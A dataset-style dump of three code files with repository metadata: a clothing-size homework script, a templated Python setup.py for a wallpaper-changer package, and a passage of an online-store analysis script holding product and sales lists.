blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
55f47b4834149c9ef3311c8954d80d28314e8527 | f7411485d2603aa8c2841f88bf5bfb2e1930951e | /Homeworks/HW3/sizefinder.py | e6208693bb10197ba3e504e3b27b698a3547cca6 | [] | no_license | Johnspeanut/Computer_science_fundation_course | 156e03e8cf6fcca4ddcbfaa837b8c55f95083045 | 79a13f3152c7e61d8d6cc10da2213a15c8a364e5 | refs/heads/master | 2023-05-13T01:55:10.171165 | 2021-05-31T07:00:31 | 2021-05-31T07:00:31 | 372,412,223 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,511 | py | """ Student name:Qiong Peng
NUID: 001559637
CS5001 Section 4, Fall 2020
Instructor: Dr.Abi Evans and Andrew Jelani
Home work 3
Programming Component
Problem 1:sizefinder.py
Program description: the program helps users to find their size based on
chese measurement in inches by kid, woman, and man.
"""
def size_checker(chest, gender):
'''
Function -- size_checker
Calculates kid, man, or woman size.
Parameters:
chest -- Chest in inches. Integer data type.
gender -- String. "M" for man; "W" for woman; "K" for kid.
Returns:
The size that it falls in, a String data type. If there is no matching
size, return "not available".
'''
if gender == "K":
if chest >= 26 and chest < 28:
return "S"
elif chest >= 28 and chest < 30:
return "M"
elif chest >= 30 and chest < 32:
return "L"
elif chest >= 32 and chest < 34:
return "XL"
elif chest >= 34 and chest < 36:
return "XXL"
return "not available"
elif gender == "W":
if chest >= 30 and chest < 32:
return "S"
elif chest >= 32 and chest < 34:
return "M"
elif chest >= 34 and chest < 36:
return "L"
elif chest >= 36 and chest < 38:
return "XL"
elif chest >= 38 and chest < 40:
return "XXL"
elif chest >= 40 and chest < 42:
return "XXXL"
return "not available"
else:
if chest >= 34 and chest < 37:
return "S"
elif chest >= 37 and chest < 40:
return "M"
elif chest >= 40 and chest < 43:
return "L"
elif chest >= 43 and chest < 47:
return "XL"
elif chest >= 47 and chest < 50:
return "XXL"
elif chest >= 50 and chest < 53:
return "XXXL"
return "not available"
def main():
chest = float(input("Chest measurement in inches: "))
kids_size = size_checker(chest, "K")
womens_size = size_checker(chest, "W")
mens_size = size_checker(chest, "M")
if (kids_size == "not available" and womens_size == "not available" and
mens_size == "not available"):
print("Sorry, we don't carry your size")
else:
print("Your size choices:")
print("Kids size:", kids_size)
print("Womens size:", womens_size)
print("Mens size:", mens_size)
if __name__ == "__main__":
main()
| [
"pengqiong2015fall@hotmail.com"
] | pengqiong2015fall@hotmail.com |
5ac2fe4e67fc38a553ab752e5075143ff019cd50 | ef566fe781737cb99d907dfc1c3a081a28cab973 | /setup.py | 3a8f5259d38a3b70298cbcd0e2cc312476552b0a | [
"MIT"
] | permissive | ayan-b/github-test | 75732ff6f6728280dfe13f469fbeacedcd2a86a2 | cd44e649993d335cf58571381232ca3191da4e71 | refs/heads/master | 2021-07-15T13:02:07.835546 | 2018-11-10T16:14:42 | 2018-11-10T16:14:42 | 156,269,776 | 0 | 0 | MIT | 2020-06-06T03:50:17 | 2018-11-05T19:17:00 | Python | UTF-8 | Python | false | false | 5,079 | py | #!/usr/bin/env python3
# Template by pypi-mobans
import os
import sys
import codecs
from shutil import rmtree
from setuptools import Command, setup, find_packages
from platform import python_implementation
PY2 = sys.version_info[0] == 2
PY26 = PY2 and sys.version_info[1] < 7
NAME = 'Desktop Wallpaper Changer'
AUTHOR = 'Ayan Banerjee'
VERSION = ''
EMAIL = 'ayanbn7@gmail.com'
LICENSE = 'MIT'
DESCRIPTION = (
'Change your desktop wallpaper!'
)
URL = 'https://github.com//Desktop Wallpaper Changer'
DOWNLOAD_URL = '%s/archive/0.0.1.tar.gz' % URL
FILES = ['README.rst', 'CHANGELOG.rst']
KEYWORDS = [
'python',
]
CLASSIFIERS = [
'Topic :: Software Development :: Libraries',
'Programming Language :: Python',
'Intended Audience :: Developers',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
]
INSTALL_REQUIRES = [
'dependency1',
'git+https://github.com/user/repo#egg=ver',
'git+https://github.com/user/repo#egg=ver',
'hello',
'dependency2',
'dep#egg=ver',
'git+https://github.com/user/repo#egg=ver',
'dependency',
'dependency#egg=ver',
]
SETUP_COMMANDS = {}
PACKAGES = find_packages(exclude=['ez_setup', 'examples', 'tests'])
EXTRAS_REQUIRE = {
}
# You do not need to read beyond this line
PUBLISH_COMMAND = '{0} setup.py sdist bdist_wheel upload -r pypi'.format(
sys.executable)
GS_COMMAND = ('gs Desktop Wallpaper Changer v0.0.1 ' +
"Find 0.0.1 in changelog for more details")
NO_GS_MESSAGE = ('Automatic github release is disabled. ' +
'Please install gease to enable it.')
UPLOAD_FAILED_MSG = (
'Upload failed. please run "%s" yourself.' % PUBLISH_COMMAND)
HERE = os.path.abspath(os.path.dirname(__file__))
class PublishCommand(Command):
"""Support setup.py upload."""
description = 'Build and publish the package on github and pypi'
user_options = []
@staticmethod
def status(s):
"""Prints things in bold."""
print('\033[1m{0}\033[0m'.format(s))
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
try:
self.status('Removing previous builds...')
rmtree(os.path.join(HERE, 'dist'))
rmtree(os.path.join(HERE, 'build'))
rmtree(os.path.join(HERE, 'Desktop Wallpaper Changer.egg-info'))
except OSError:
pass
self.status('Building Source and Wheel (universal) distribution...')
run_status = True
if has_gease():
run_status = os.system(GS_COMMAND) == 0
else:
self.status(NO_GS_MESSAGE)
if run_status:
if os.system(PUBLISH_COMMAND) != 0:
self.status(UPLOAD_FAILED_MSG % PUBLISH_COMMAND)
sys.exit()
SETUP_COMMANDS.update({
'publish': PublishCommand
})
def has_gease():
"""
test if github release command is installed
visit http://github.com/moremoban/gease for more info
"""
try:
import gease # noqa
return True
except ImportError:
return False
def read_files(*files):
"""Read files into setup"""
text = ""
for single_file in files:
content = read(single_file)
text = text + content + "\n"
return text
def read(afile):
"""Read a file into setup"""
the_relative_file = os.path.join(HERE, afile)
with codecs.open(the_relative_file, 'r', 'utf-8') as opened_file:
content = filter_out_test_code(opened_file)
content = "".join(list(content))
return content
def filter_out_test_code(file_handle):
found_test_code = False
for line in file_handle.readlines():
if line.startswith('.. testcode:'):
found_test_code = True
continue
if found_test_code is True:
if line.startswith(' '):
continue
else:
empty_line = line.strip()
if len(empty_line) == 0:
continue
else:
found_test_code = False
yield line
else:
for keyword in ['|version|', '|today|']:
if keyword in line:
break
else:
yield line
if __name__ == '__main__':
setup(
name=NAME,
author=AUTHOR,
version=VERSION,
author_email=EMAIL,
description=DESCRIPTION,
url=URL,
download_url=DOWNLOAD_URL,
long_description=read_files(*FILES),
license=LICENSE,
keywords=KEYWORDS,
extras_require=EXTRAS_REQUIRE,
tests_require=['nose'],
install_requires=INSTALL_REQUIRES,
packages=PACKAGES,
include_package_data=True,
zip_safe=False,
classifiers=CLASSIFIERS,
cmdclass=SETUP_COMMANDS
)
| [
"ayanbanerjee7777@gmail.com"
] | ayanbanerjee7777@gmail.com |
de76b8226e901dc15402c52c9e5d1c1a7a6ac914 | 37071746c2e7d89fcbeed13013e4bf620c774eb5 | /PROYECTO-01-ARVIZU-PATRICIA.py | f5992d22f2167c484b8e37ae812eaf2b10855451 | [] | no_license | patyarvizu/Proyecto-01 | db9410bbb6e2222597d0468a20ca0983f25c0bf5 | 8291eb2862b720caad1d715dee62fc16b74b4c0e | refs/heads/main | 2023-07-19T10:29:02.143507 | 2021-09-14T06:20:28 | 2021-09-14T06:20:28 | 406,248,462 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 47,813 | py | #Definición de las listas
lifestore_products = [
[1, 'Procesador AMD Ryzen 3 3300X S-AM4, 3.80GHz, Quad-Core, 16MB L2 Cache', 3019, 'procesadores', 16],
[2, 'Procesador AMD Ryzen 5 3600, S-AM4, 3.60GHz, 32MB L3 Cache, con Disipador Wraith Stealth', 4209, 'procesadores', 182],
[3, 'Procesador AMD Ryzen 5 2600, S-AM4, 3.40GHz, Six-Core, 16MB L3 Cache, con Disipador Wraith Stealth', 3089, 'procesadores', 987],
[4, 'Procesador AMD Ryzen 3 3200G con Gráficos Radeon Vega 8, S-AM4, 3.60GHz, Quad-Core, 4MB L3, con Disipador Wraith Spire', 2209, 'procesadores', 295],
[5, 'Procesador Intel Core i3-9100F, S-1151, 3.60GHz, Quad-Core, 6MB Cache (9na. Generación - Coffee Lake)', 1779, 'procesadores', 130],
[6, 'Procesador Intel Core i9-9900K, S-1151, 3.60GHz, 8-Core, 16MB Smart Cache (9na. Generación Coffee Lake)', 11809, 'procesadores', 54],
[7, 'Procesador Intel Core i7-9700K, S-1151, 3.60GHz, 8-Core, 12MB Smart Cache (9na. Generación Coffee Lake)', 8559, 'procesadores', 114],
[8, 'Procesador Intel Core i5-9600K, S-1151, 3.70GHz, Six-Core, 9MB Smart Cache (9na. Generiación - Coffee Lake)', 5399, 'procesadores', 8],
[9, 'Procesador Intel Core i3-8100, S-1151, 3.60GHz, Quad-Core, 6MB Smart Cache (8va. Generación - Coffee Lake)', 2549, 'procesadores', 35],
[10, 'MSI GeForce 210, 1GB GDDR3, DVI, VGA, HDCP, PCI Express 2.0', 889, 'tarjetas de video', 13],
[11, 'Tarjeta de Video ASUS AMD Radeon RX 570, 4GB 256-bit GDDR5, PCI Express 3.0', 7399, 'tarjetas de video', 2],
[12, 'Tarjeta de Video ASUS NVIDIA GeForce GTX 1660 SUPER EVO OC, 6GB 192-bit GDDR6, PCI Express x16 3.0', 6619, 'tarjetas de video', 0],
[13, 'Tarjeta de Video Asus NVIDIA GeForce GTX 1050 Ti Phoenix, 4GB 128-bit GDDR5, PCI Express 3.0', 3989, 'tarjetas de video', 1],
[14, 'Tarjeta de Video EVGA NVIDIA GeForce GT 710, 2GB 64-bit GDDR3, PCI Express 2.0', 1439, 'tarjetas de video', 36],
[15, 'Tarjeta de Video EVGA NVIDIA GeForce GTX 1660 Ti SC Ultra Gaming, 6GB 192-bit GDDR6, PCI 3.0', 8439, 'tarjetas de video', 15],
[16, 'Tarjeta de Video EVGA NVIDIA GeForce RTX 2060 SC ULTRA Gaming, 6GB 192-bit GDDR6, PCI Express 3.0', 9799, 'tarjetas de video', 10],
[17, 'Tarjeta de Video Gigabyte AMD Radeon R7 370 OC, 2GB 256-bit GDDR5, PCI Express 3.0', 4199, 'tarjetas de video', 1],
[18, 'Tarjeta de Video Gigabyte NVIDIA GeForce GT 1030, 2GB 64-bit GDDR5, PCI Express x16 3.0', 2199, 'tarjetas de video', 5],
[19, 'Tarjeta de Video Gigabyte NVIDIA GeForce GTX 1650 OC Low Profile, 4GB 128-bit GDDR5, PCI Express 3.0 x16', 4509, 'tarjetas de video', 8],
[20, 'Tarjeta de Video Gigabyte NVIDIA GeForce RTX 2060 SUPER WINDFORCE OC, 8 GB 256 bit GDDR6, PCI Express x16 3.0', 11509, 'tarjetas de video', 10],
[21, 'Tarjeta de Video MSI AMD Mech Radeon RX 5500 XT MECH Gaming OC, 8GB 128-bit GDDR6, PCI Express 4.0', 5159, 'tarjetas de video', 0],
[22, 'Tarjeta de Video MSI NVIDIA GeForce GTX 1050 Ti OC, 4GB 128-bit GDDR5, PCI Express x16 3.0', 3429, 'tarjetas de video', 0],
[23, 'Tarjeta de Video MSI Radeon X1550, 128MB 64 bit GDDR2, PCI Express x16', 909, 'tarjetas de video', 10],
[24, 'Tarjeta de Video PNY NVIDIA GeForce RTX 2080, 8GB 256-bit GDDR6, PCI Express 3.0\xa0', 30449, 'tarjetas de video', 2],
[25, 'Tarjeta de Video Sapphire AMD Pulse Radeon RX 5500 XT Gaming, 8GB 128-bit GDDR6, PCI Express 4.0', 5529, 'tarjetas de video', 10],
[26, 'Tarjeta de Video VisionTek AMD Radeon HD 5450, 1GB DDR3, PCI Express x16 2.1', 1249, 'tarjetas de video', 180],
[27, 'Tarjeta de Video VisionTek AMD Radeon HD5450, 2GB GDDR3, PCI Express x16', 2109, 'tarjetas de video', 43],
[28, 'Tarjeta de Video Zotac NVIDIA GeForce GTX 1660 Ti, 6GB 192-bit GDDR6, PCI Express x16 3.0', 9579, 'tarjetas de video', 3],
[29, 'Tarjeta Madre ASUS micro ATX TUF B450M-PLUS GAMING, S-AM4, AMD B450, HDMI, 64GB DDR4 para AMD', 2499, 'tarjetas madre', 10],
[30, 'Tarjeta Madre AORUS ATX Z390 ELITE, S-1151, Intel Z390, HDMI, 64GB DDR4 para Intel', 4029, 'tarjetas madre', 50],
[31, 'Tarjeta Madre AORUS micro ATX B450 AORUS M (rev. 1.0), S-AM4, AMD B450, HDMI, 64GB DDR4 para AMD', 2229, 'tarjetas madre', 120],
[32, 'Tarjeta Madre ASRock Z390 Phantom Gaming 4, S-1151, Intel Z390, HDMI, 64GB DDR4 para Intel\xa0', 4309, 'tarjetas madre', 10],
[33, 'Tarjeta Madre ASUS ATX PRIME Z390-A, S-1151, Intel Z390, HDMI, 64GB DDR4 para Intel\xa0', 4269, 'tarjetas madre', 43],
[34, 'Tarjeta Madre ASUS ATX ROG STRIX B550-F GAMING WI-FI, S-AM4, AMD B550, HDMI, max. 128GB DDR4 para AMD', 5289, 'tarjetas madre', 2],
[35, 'Tarjeta Madre Gigabyte micro ATX Z390 M GAMING, S-1151, Intel Z390, HDMI, 64GB DDR4 para Intel\xa0', 3419, 'tarjetas madre', 30],
[36, 'Tarjeta Madre Gigabyte micro ATX Z490M GAMING X (rev. 1.0), Intel Z490, HDMI, 128GB DDR4 para Intel', 4159, 'tarjetas madre', 10],
[37, 'Tarjeta Madre ASRock ATX Z490 STEEL LEGEND, S-1200, Intel Z490, HDMI, 128GB DDR4 para Intel', 4289, 'tarjetas madre', 60],
[38, 'Tarjeta Madre Gigabyte Micro ATX H310M DS2 2.0, S-1151, Intel H310, 32GB DDR4 para Intel\xa0', 1369, 'tarjetas madre', 15],
[39, 'ASUS T. Madre uATX M4A88T-M, S-AM3, DDR3 para Phenom II/Athlon II/Sempron 100', 2169, 'tarjetas madre', 98],
[40, 'Tarjeta Madre Gigabyte XL-ATX TRX40 Designare, S-sTRX4, AMD TRX40, 256GB DDR4 para AMD', 17439, 'tarjetas madre', 1],
[41, 'Tarjeta Madre ASUS micro ATX Prime H370M-Plus/CSM, S-1151, Intel H370, HDMI, 64GB DDR4 para Intel', 3329, 'tarjetas madre', 286],
[42, 'Tarjeta Madre ASRock Micro ATX B450M Steel Legend, S-AM4, AMD B450, HDMI, 64GB DDR4 para AMD', 1779, 'tarjetas madre', 0],
[43, 'Tarjeta Madre ASUS ATX ROG STRIX Z390-E GAMING, S-1151, Intel Z390, HDMI, 64GB DDR4 para Intel', 6369, 'tarjetas madre', 5],
[44, 'Tarjeta Madre MSI ATX B450 TOMAHAWK MAX, S-AM4, AMD B450, 64GB DDR4 para AMD', 2759, 'tarjetas madre', 0],
[45, 'Tarjeta Madre ASRock ATX H110 Pro BTC+, S-1151, Intel H110, 32GB DDR4, para Intel', 2869, 'tarjetas madre', 25],
[46, 'Tarjeta Madre Gigabyte micro ATX GA-H110M-DS2, S-1151, Intel H110, 32GB DDR4 para Intel', 1539, 'tarjetas madre', 49],
[47, 'SSD XPG SX8200 Pro, 256GB, PCI Express, M.2', 1209, 'discos duros', 8],
[48, 'SSD Kingston A2000 NVMe, 1TB, PCI Express 3.0, M2', 2559, 'discos duros', 50],
[49, 'Kit SSD Kingston KC600, 1TB, SATA III, 2.5, 7mm', 3139, 'discos duros', 3],
[50, 'SSD Crucial MX500, 1TB, SATA III, M.2', 2949, 'discos duros', 4],
[51, 'SSD Kingston UV500, 480GB, SATA III, mSATA', 2399, 'discos duros', 0],
[52, 'SSD Western Digital WD Blue 3D NAND, 2TB, M.2', 5659, 'discos duros', 13],
[53, 'SSD Addlink Technology S70, 512GB, PCI Express 3.0, M.2', 2039, 'discos duros', 1],
[54, "SSD Kingston A400, 120GB, SATA III, 2.5'', 7mm", 259, 'discos duros', 300],
[55, 'SSD para Servidor Supermicro SSD-DM128-SMCMVN1, 128GB, SATA III, mSATA, 6Gbit/s', 4399, 'discos duros', 10],
[56, "SSD para Servidor Lenovo Thinksystem S4500, 480GB, SATA III, 3.5'', 7mm", 3269, 'discos duros', 3],
[57, "SSD Adata Ultimate SU800, 256GB, SATA III, 2.5'', 7mm", 889, 'discos duros', 15],
[58, "SSD para Servidor Lenovo Thinksystem S4510, 480GB, SATA III, 2.5'', 7mm", 3679, 'discos duros', 16],
[59, 'SSD Samsung 860 EVO, 1TB, SATA III, M.2', 5539, 'discos duros', 10],
[60, 'Kit Memoria RAM Corsair Dominator Platinum DDR4, 3200MHz, 16GB (2x 8GB), Non-ECC, CL16, XMP', 2519, 'memorias usb', 10],
[61, 'Kit Memoria RAM Corsair Vengeance LPX DDR4, 2400MHz, 32GB, Non-ECC, CL16', 5209, 'memorias usb', 5],
[62, "Makena Smart TV LED 32S2 32'', HD, Widescreen, Gris", 2899, 'pantallas', 6],
[63, 'Seiki TV LED SC-39HS950N 38.5, HD, Widescreen, Negro', 3369, 'pantallas', 146],
[64, 'Samsung TV LED LH43QMREBGCXGO 43, 4K Ultra HD, Widescreen, Negro', 12029, 'pantallas', 71],
[65, 'Samsung Smart TV LED UN70RU7100FXZX 70, 4K Ultra HD, Widescreen, Negro', 21079, 'pantallas', 7],
[66, 'TCL Smart TV LED 55S425 54.6, 4K Ultra HD, Widescreen, Negro', 8049, 'pantallas', 188],
[67, 'TV Monitor LED 24TL520S-PU 24, HD, Widescreen, HDMI, Negro', 3229, 'pantallas', 411],
[68, "Makena Smart TV LED 40S2 40'', Full HD, Widescreen, Negro", 4229, 'pantallas', 239],
[69, 'Hisense Smart TV LED 40H5500F 39.5, Full HD, Widescreen, Negro', 5359, 'pantallas', 94],
[70, 'Samsung Smart TV LED 43, Full HD, Widescreen, Negro', 7679, 'pantallas', 10],
[71, 'Samsung Smart TV LED UN32J4290AF 32, HD, Widescreen, Negro', 4829, 'pantallas', 3],
[72, 'Hisense Smart TV LED 50H8F 49.5, 4K Ultra HD, Widescreen, Negro', 9759, 'pantallas', 11],
[73, 'Samsung Smart TV LED UN55TU7000FXZX 55, 4K Ultra HD, Widescreen, Negro/Gris', 10559, 'pantallas', 4],
[74, 'Logitech Bocinas para Computadora con Subwoofer G560, Bluetooth, Inalámbrico, 2.1, 120W RMS, USB, negro', 4239, 'bocinas', 1],
[75, 'Lenovo Barra de Sonido, Alámbrico, 2.5W, USB, Negro', 441, 'bocinas', 11],
[76, 'Acteck Bocina con Subwoofer AXF-290, Bluetooth, Inalámbrico, 2.1, 18W RMS, 180W PMPO, USB, Negro', 589, 'bocinas', 18],
[77, 'Verbatim Bocina Portátil Mini, Bluetooth, Inalámbrico, 3W RMS, USB, Blanco', 178, 'bocinas', 1],
[78, 'Ghia Bocina Portátil BX300, Bluetooth, Inalámbrico, 40W RMS, USB, Rojo - Resistente al Agua', 769, 'bocinas', 2],
[79, 'Naceb Bocina Portátil NA-0301, Bluetooth, Inalámbrico, USB 2.0, Rojo', 709, 'bocinas', 31],
[80, 'Ghia Bocina Portátil BX800, Bluetooth, Inalámbrico, 2.1 Canales, 31W, USB, Negro', 1359, 'bocinas', 15],
[81, 'Ghia Bocina Portátil BX900, Bluetooth, Inalámbrico, 2.1 Canales, 34W, USB, Negro - Resistente al Agua', 1169, 'bocinas', 20],
[82, 'Ghia Bocina Portátil BX400, Bluetooth, Inalámbrico, 8W RMS, USB, Negro', 549, 'bocinas', 31],
[83, 'Ghia Bocina Portátil BX500, Bluetooth, Inalámbrico, 10W RMS, USB, Gris', 499, 'bocinas', 16],
[84, 'Logitech Audífonos Gamer G332, Alámbrico, 2 Metros, 3.5mm, Negro/Rojo', 1089, 'audifonos', 83],
[85, 'Logitech Audífonos Gamer G635 7.1, Alámbrico, 1.5 Metros, 3.5mm, Negro/Azul', 2159, 'audifonos', 39],
[86, 'ASUS Audífonos Gamer ROG Theta 7.1, Alámbrico, USB C, Negro', 8359, 'audifonos', 20],
[87, 'Acer Audífonos Gamer Galea 300, Alámbrico, 3.5mm, Negro', 1719, 'audifonos', 8],
[88, 'Audífonos Gamer Balam Rush Orphix RGB 7.1, Alámbrico, USB, Negro', 909, 'audifonos', 15],
[89, 'Cougar Audífonos Gamer Phontum Essential, Alámbrico, 1.9 Metros, 3.5mm, Negro.', 859, 'audifonos', 4],
[90, 'Energy Sistem Audífonos con Micrófono Headphones 1, Bluetooh, Inalámbrico, Negro/Grafito', 539, 'audifonos', 1],
[91, 'Genius GHP-400S Audífonos, Alámbrico, 1.5 Metros, Rosa', 137, 'audifonos', 16],
[92, 'Getttech Audífonos con Micrófono Sonority, Alámbrico, 1.2 Metros, 3.5mm, Negro/Rosa', 149, 'audifonos', 232],
[93, 'Ginga Audífonos con Micrófono GI18ADJ01BT-RO, Bluetooth, Alámbrico/Inalámbrico, 3.5mm, Rojo', 160, 'audifonos', 139],
[94, 'HyperX Audífonos Gamer Cloud Flight para PC/PS4/PS4 Pro, Inalámbrico, USB, 3.5mm, Negro', 2869, 'audifonos', 12],
[95, 'Iogear Audífonos Gamer GHG601, Alámbrico, 1.2 Metros, 3.5mm, Negro', 999, 'audifonos', 2],
[96, 'Klip Xtreme Audífonos Blast, Bluetooth, Inalámbrico, Negro/Verde', 769, 'audifonos', 2]
]
lifestore_sales = [
[1, 1, 5, '24/07/2020', 0],
[2, 1, 5, '27/07/2020', 0],
[3, 2, 5, '24/02/2020', 0],
[4, 2, 5, '22/05/2020', 0],
[5, 2, 5, '01/01/2020', 0],
[6, 2, 5, '24/04/2020', 0],
[7, 2, 4, '31/01/2020', 0],
[8, 2, 4, '07/02/2020', 0],
[9, 2, 4, '02/03/2020', 0],
[10, 2, 4, '07/03/2020', 0],
[11, 2, 4, '24/03/2020', 0],
[12, 2, 4, '24/04/2020', 0],
[13, 2, 4, '02/05/2020', 0],
[14, 2, 4, '03/06/2020', 0],
[15, 2, 3, '10/11/2019', 1],
[16, 3, 5, '21/07/2020', 0],
[17, 3, 4, '21/07/2020', 0],
[18, 3, 5, '11/06/2020', 0],
[19, 3, 5, '11/06/2020', 0],
[20, 3, 5, '20/05/2020', 0],
[21, 3, 5, '15/05/2020', 0],
[22, 3, 5, '02/05/2020', 0],
[23, 3, 5, '30/04/2020', 0],
[24, 3, 5, '27/04/2020', 0],
[25, 3, 4, '22/04/2020', 0],
[26, 3, 5, '19/04/2020', 0],
[27, 3, 5, '16/04/2020', 0],
[28, 3, 3, '14/04/2020', 0],
[29, 3, 5, '14/04/2020', 0],
[30, 3, 5, '14/04/2020', 0],
[31, 3, 5, '13/04/2020', 0],
[32, 3, 5, '13/04/2020', 0],
[33, 3, 5, '06/04/2020', 0],
[34, 3, 5, '02/04/2020', 0],
[35, 3, 5, '01/04/2020', 0],
[36, 3, 5, '16/03/2020', 0],
[37, 3, 5, '11/03/2020', 0],
[38, 3, 4, '10/03/2020', 0],
[39, 3, 5, '02/03/2020', 0],
[40, 3, 5, '27/02/2020', 0],
[41, 3, 4, '27/02/2020', 0],
[42, 3, 5, '03/02/2020', 0],
[43, 3, 5, '31/01/2020', 0],
[44, 3, 5, '30/01/2020', 0],
[45, 3, 5, '28/01/2020', 0],
[46, 3, 5, '25/01/2020', 0],
[47, 3, 5, '19/01/2020', 0],
[48, 3, 5, '13/01/2020', 0],
[49, 3, 5, '11/01/2020', 0],
[50, 3, 4, '09/01/2020', 0],
[51, 3, 5, '08/01/2020', 0],
[52, 3, 4, '06/01/2020', 0],
[53, 3, 5, '04/01/2020', 0],
[54, 3, 5, '04/01/2020', 0],
[55, 3, 5, '03/01/2020', 0],
[56, 3, 5, '02/01/2020', 0],
[57, 3, 5, '01/01/2020', 0],
[58, 4, 4, '19/06/2020', 0],
[59, 4, 4, '04/06/2020', 0],
[60, 4, 5, '16/04/2020', 0],
[61, 4, 4, '07/04/2020', 0],
[62, 4, 5, '06/04/2020', 0],
[63, 4, 5, '06/04/2020', 0],
[64, 4, 5, '30/03/2020', 0],
[65, 4, 4, '08/03/2020', 0],
[66, 4, 5, '25/02/2020', 0],
[67, 4, 3, '29/01/2020', 0],
[68, 4, 5, '23/01/2020', 0],
[69, 4, 4, '11/01/2020', 0],
[70, 4, 5, '09/01/2020', 0],
[71, 5, 4, '03/07/2020', 0],
[72, 5, 4, '14/05/2020', 0],
[73, 5, 4, '05/05/2020', 0],
[74, 5, 5, '04/05/2020', 0],
[75, 5, 4, '04/05/2020', 0],
[76, 5, 5, '03/05/2020', 0],
[77, 5, 5, '26/04/2020', 0],
[78, 5, 5, '23/04/2020', 0],
[79, 5, 5, '17/04/2020', 0],
[80, 5, 5, '13/04/2020', 0],
[81, 5, 5, '06/04/2020', 0],
[82, 5, 5, '26/04/2020', 0],
[83, 5, 5, '24/03/2020', 0],
[84, 5, 5, '22/03/2020', 0],
[85, 5, 4, '10/03/2020', 0],
[86, 5, 5, '25/02/2020', 0],
[87, 5, 4, '24/02/2020', 0],
[88, 5, 5, '15/02/2020', 0],
[89, 5, 5, '30/01/2020', 0],
[90, 5, 5, '17/01/2020', 0],
[91, 6, 5, '05/05/2020', 0],
[92, 6, 5, '22/03/2020', 0],
[93, 6, 5, '04/02/2020', 0],
[94, 7, 5, '25/07/2020', 0],
[95, 7, 5, '17/06/2020', 0],
[96, 7, 5, '15/04/2020', 0],
[97, 7, 5, '03/04/2020', 0],
[98, 7, 5, '31/03/2020', 0],
[99, 7, 5, '28/03/2020', 0],
[100, 7, 5, '22/02/2020', 0],
[101, 8, 5, '20/04/2020', 0],
[102, 8, 5, '16/02/2020', 0],
[103, 8, 5, '27/01/2020', 0],
[104, 8, 5, '20/01/2020', 0],
[105, 10, 4, '14/05/2020', 0],
[106, 11, 5, '30/06/2020', 0],
[107, 11, 5, '02/04/2020', 0],
[108, 11, 5, '05/03/2020', 0],
[109, 12, 5, '05/05/2020', 0],
[110, 12, 4, '09/04/2020', 0],
[111, 12, 5, '09/04/2020', 0],
[112, 12, 5, '02/04/2020', 0],
[113, 12, 5, '25/03/2020', 0],
[114, 12, 5, '24/03/2020', 0],
[115, 12, 5, '06/03/2020', 0],
[116, 12, 5, '04/03/2020', 0],
[117, 12, 4, '27/02/2020', 0],
[118, 13, 4, '17/04/2020', 0],
[119, 17, 1, '05/09/2020', 1],
[120, 18, 5, '30/06/2020', 0],
[121, 18, 4, '14/03/2020', 0],
[122, 18, 5, '27/02/2020', 0],
[123, 18, 4, '02/02/2020', 0],
[124, 18, 4, '01/02/2020', 0],
[125, 21, 5, '14/04/2020', 0],
[126, 21, 5, '12/02/2020', 0],
[127, 22, 5, '20/04/2020', 0],
[128, 25, 5, '28/03/2020', 0],
[129, 25, 5, '20/03/2020', 0],
[130, 28, 5, '30/03/2020', 0],
[131, 29, 4, '04/05/2020', 0],
[132, 29, 5, '24/04/2020', 0],
[133, 29, 4, '24/04/2020', 0],
[134, 29, 4, '17/04/2020', 0],
[135, 29, 5, '04/04/2020', 0],
[136, 29, 5, '09/03/2020', 0],
[137, 29, 5, '07/03/2020', 0],
[138, 29, 5, '26/02/2020', 0],
[139, 29, 5, '09/02/2020', 0],
[140, 29, 5, '06/02/2020', 0],
[141, 29, 5, '26/01/2020', 0],
[142, 29, 4, '25/01/2020', 0],
[143, 29, 1, '13/01/2020', 1],
[144, 29, 1, '10/01/2020', 0],
[145, 31, 1, '02/05/2020', 1],
[146, 31, 1, '02/05/2020', 1],
[147, 31, 1, '01/04/2020', 1],
[148, 31, 4, '20/03/2020', 0],
[149, 31, 3, '14/03/2020', 0],
[150, 31, 1, '11/01/2020', 0],
[151, 33, 5, '20/03/2020', 0],
[152, 33, 4, '27/02/2020', 0],
[153, 40, 5, '24/05/2020', 0],
[154, 42, 5, '27/07/2020', 0],
[155, 42, 5, '04/05/2020', 0],
[156, 42, 4, '04/05/2020', 0],
[157, 42, 4, '04/05/2020', 0],
[158, 42, 5, '04/05/2020', 0],
[159, 42, 5, '27/04/2020', 0],
[160, 42, 5, '26/04/2020', 0],
[161, 42, 4, '19/04/2020', 0],
[162, 42, 5, '14/04/2020', 0],
[163, 42, 5, '09/04/2020', 0],
[164, 42, 4, '05/04/2020', 0],
[165, 42, 4, '21/03/2020', 0],
[166, 42, 5, '09/03/2020', 0],
[167, 42, 5, '09/03/2020', 0],
[168, 42, 5, '03/03/2020', 0],
[169, 42, 4, '23/02/2020', 0],
[170, 42, 4, '03/02/2020', 0],
[171, 42, 4, '09/01/2020', 0],
[172, 44, 5, '16/04/2020', 0],
[173, 44, 5, '11/04/2020', 0],
[174, 44, 5, '21/03/2020', 0],
[175, 44, 4, '02/03/2020', 0],
[176, 44, 4, '01/03/2020', 0],
[177, 44, 5, '05/01/2020', 0],
[178, 45, 1, '11/02/2020', 1],
[179, 46, 2, '07/03/2020', 1],
[180, 47, 4, '02/07/2020', 0],
[181, 47, 5, '10/06/2020', 0],
